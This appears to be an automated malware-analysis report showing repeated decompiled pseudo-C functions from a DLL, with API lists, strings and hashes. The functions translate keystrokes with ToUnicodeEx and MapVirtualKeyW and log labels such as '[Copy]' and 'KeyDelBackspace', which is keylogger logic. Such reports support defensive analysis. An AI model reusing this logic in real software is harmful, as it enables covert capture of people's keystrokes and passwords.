                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Esc]
                  • API String ID: 783433895-3858598201
                  • Opcode ID: 77c0f584e0695a7ac5b051d0ce750dd1d5baeb7579199a9787a9a3ee3ba27aa5
                  • Instruction ID: a0438d12f8ed14f13429e205a5184d8ddefa3685f311b8074393ca4d61dc1d3f
                  • Opcode Fuzzy Hash: 77c0f584e0695a7ac5b051d0ce750dd1d5baeb7579199a9787a9a3ee3ba27aa5
                  • Instruction Fuzzy Hash: 6131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007255(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Back Tab]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Back Tab]
                  • API String ID: 783433895-1646378708
                  • Opcode ID: 93a1f9fd4b03a2b64f3aec136e1b11870f180bc3e6a4538c105c08aaf9b2b6df
                  • Instruction ID: 3a85998fe2589ccb64e60228e5e214ad5b480cee4fe54291cbf2aada2de1e6bb
                  • Opcode Fuzzy Hash: 93a1f9fd4b03a2b64f3aec136e1b11870f180bc3e6a4538c105c08aaf9b2b6df
                  • Instruction Fuzzy Hash: 4131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007266(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Copy]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Copy]
                  • API String ID: 783433895-3795801677
                  • Opcode ID: 44d757909d80be684137888da5a970062e875dbb24bf93a2939e8a7e6361997e
                  • Instruction ID: 34291bd968ee6a57f754c6061d72616049048bf9c09e257ad4a1739f3e02d25f
                  • Opcode Fuzzy Hash: 44d757909d80be684137888da5a970062e875dbb24bf93a2939e8a7e6361997e
                  • Instruction Fuzzy Hash: 0D31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007277(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Finish]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Finish]
                  • API String ID: 783433895-126034051
                  • Opcode ID: 692f9ff7583ff38c64fa304b1c97454ce66ce919cf4bbd85751b8f3092655a58
                  • Instruction ID: a0ed5623e56a33cb834bfc176e6fd190eaeae0050e97d100fa21e54e37a1b336
                  • Opcode Fuzzy Hash: 692f9ff7583ff38c64fa304b1c97454ce66ce919cf4bbd85751b8f3092655a58
                  • Instruction Fuzzy Hash: EB31BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007288(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Reset]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
			}

                  0x10007288
                  0x10007288
                  0x1000728f
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Reset]
                  • API String ID: 783433895-245523249
                  • Opcode ID: 0bc9773a6bbad631a6a70fe1f822373a926ab4f180a8ef66085c0ab71cdd19d9
                  • Instruction ID: 291c1767fd01b166514c41e15e57a47f42bc66d9c0c46ca14ea2eebe3236c6d1
                  • Opcode Fuzzy Hash: 0bc9773a6bbad631a6a70fe1f822373a926ab4f180a8ef66085c0ab71cdd19d9
                  • Instruction Fuzzy Hash: F031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007299(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Play]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
			}

                  0x10007299
                  0x10007299
                  0x100072a0
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Play]
                  • API String ID: 783433895-3392069046
                  • Opcode ID: 7cbc7b547a09e3bc52c6deb3fa975999c833a7782dcd4b422faccb44a12d16fc
                  • Instruction ID: c39f81576484fb7735cad50cf9efa43f524eeb1dbde31a28f4c5d3b5c036a80a
                  • Opcode Fuzzy Hash: 7cbc7b547a09e3bc52c6deb3fa975999c833a7782dcd4b422faccb44a12d16fc
                  • Instruction Fuzzy Hash: 2731C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100072AA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
